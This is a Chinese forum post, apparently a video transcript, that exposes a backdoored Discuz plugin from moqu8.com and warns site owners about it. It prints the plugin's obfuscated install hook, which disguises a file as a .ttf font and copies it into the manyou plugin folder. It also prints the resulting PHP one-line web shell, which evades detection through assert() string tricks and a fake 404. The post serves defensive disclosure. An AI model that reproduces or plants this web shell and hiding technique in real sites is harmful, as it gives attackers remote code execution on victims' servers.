揭秘整个过程视频观看地址:
http://www.iqiyi.com/w_19rvbcv5vx.html
http://v.youku.com/v_show/id_XMzA5NDEyMDA2NA==.html
http://my.tv.sohu.com/us/326324566/93860557.shtml
请大家扩散出去,避免更多的无辜站长受害!
下面是录视频记录的内容
大家好,今天想下载一个资源,于是搜到了垃圾网站.魔趣吧
下载下来发现存在后门木马.严重威胁各位作网站的同行安全问题
今天我就来揭露该垃圾的嘴脸,希望不要有更多的站长被木马控制
Quotehttp://www.moqu8.com/thread-7820-1-1.html
这是我们今天用来揭谜的帖子资源(其他的就不一一看了,因为我就是找这个资源找到这个垃圾网站的.差点被控制
我们先下载下来看看
MD5: 5165668B431963D971E14B19FB61959A
SHA1: 3BB656B048CD07A502D318EE58526E51D039A77B
CRC32: 4E12378A
附件信息
注意MD5 如果大家需要验证我说的是否真假验证MD5就可以防止我揭密后 被该垃圾站长修改了附件
木马的运行是一安装就注入了
require_once 'config/check.php';
copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/2.ttf',DISCUZ_ROOT.authcode('ca70pfWYubcn95qp9nCqz6i0TnMyEcZy3x1C85BwFgMtQ0Axj037kgspR6gporNzAtTMxC1q+1ovgZfdm3gr5negoq72+sdM/kmrFDy9','DECODE','addon'));
我们随便解密一段代码看看
copy(DISCUZ_ROOT.'source/plugin/wq_buluo/template/2.ttf',DISCUZ_ROOT.'./source/plugin/manyou/Service/Server/Sclouds.php');
翻译下得出
复制文件source/plugin/wq_buluo/template/2.ttf到/source/plugin/manyou/Service/Server/Sclouds.php
我们接下来看看2.ttf是个什么东西
<?php
error_reporting(0);
if($_POST['id']){ 如果POST id不为空则运行下面的代码
$str='aert';
$e=trim($str,'ert').str_repeat('s',2).trim($str,'art').trim($str,'aet').trim($str,'aer');
assert($_POST['id']);//一句话木马
}else{否则返回404
header('HTTP/1.1 404 Not Found');
}
?>
由此可见该后门木马的运行程序是 安装插件时 复制 2.ttf到系统目录plugin/manyou 这个插件是系统自带的漫游插件 后台检测不到是否被修改 如果直接加在其他系统文件 后台的文件效应能够看到 够聪明的
综上可见该网站散播后门木马是不争的事实 希望各位discuz站长能够分享出去避免让更多的无辜站长受害
打着每个亲测 无后门的幌子欺骗善良的站长 此类行为该抵制
copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/index.htm',DISCUZ_ROOT.authcode('4de98tRmZEiyfCOIH31Y0XaMxQAndNsnuI8LV7g3lHkCxI0DEg1HDjhMfqoOKIMP5P46bbtF7Aiz2kyvI6bK5Gm/zKHVgQk','DECODE','addon'));}else{
copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/index1.htm',DISCUZ_ROOT.authcode('4de98tRmZEiyfCOIH31Y0XaMxQAndNsnuI8LV7g3lHkCxI0DEg1HDjhMfqoOKIMP5P46bbtF7Aiz2kyvI6bK5Gm/zKHVgQk','DECODE','addon'));}
copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/1.ttf',DISCUZ_ROOT.authcode('ad35AdUSHEsWLkRwzMBl+UMWEcB4HJExecDO2x/97pJarU+VHRRZGDZnmUx2G3lmLEHH38YJNt1YZ+BRwv0sF3AU80jpA75YTBHAEesn4Q','DECODE','addon'));
这些代码解密出来意思也差不多 都市执行后门文件的注入
视频就到这里 谢谢大家观看